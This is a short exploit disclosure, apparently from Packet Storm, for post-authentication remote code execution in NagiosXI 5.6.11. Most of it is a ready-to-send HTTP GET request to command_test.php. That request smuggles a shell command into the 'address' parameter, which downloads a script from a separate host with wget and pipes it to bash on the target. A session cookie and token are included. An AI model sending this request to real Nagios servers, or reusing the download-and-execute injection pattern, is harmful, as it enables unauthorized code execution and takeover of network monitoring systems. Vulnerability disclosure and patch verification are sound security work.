NagiosXI version 5.6.11 post authentication address parameter remote code execution exploit.
428cf9e7378b1a7c753e11aa12708d599dc69c144f7915dad4f27913824c00eb# Title: Postauth RCE in NagiosXI 5.6.11 (param: address)
# Date: 13.03.2020
# Vendor: https://www.nagios.com/
# Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/
# Repo: https://github.com/c610/free/
GET /nagiosxi/includes/components/ccm/command_test.php?cmd=test&token=300de1b8ae47ed0dd96a837937df8eff&mode=test&address=127.0.0.1||(wget%20http://192.168.1.170/a.sh|bash%20a.sh);%23&cid=12&arg1=20%25&arg2=10%25&arg3=%2F&arg4=&arg5=&arg6=&arg7=&arg8=&nsp=912a3da8396db75e6fc275f556a6f076b4c830a4c3ec4c17a16771b704ea8bbe HTTP/1.1
Host: 192.168.1.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.1.10/nagiosxi/includes/components/ccm/?cmd=modify&type=service&id=2&page=1&returnUrl=index.php
Cookie: nagiosxi=4usi1041slmu9064dfqfo9c502
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed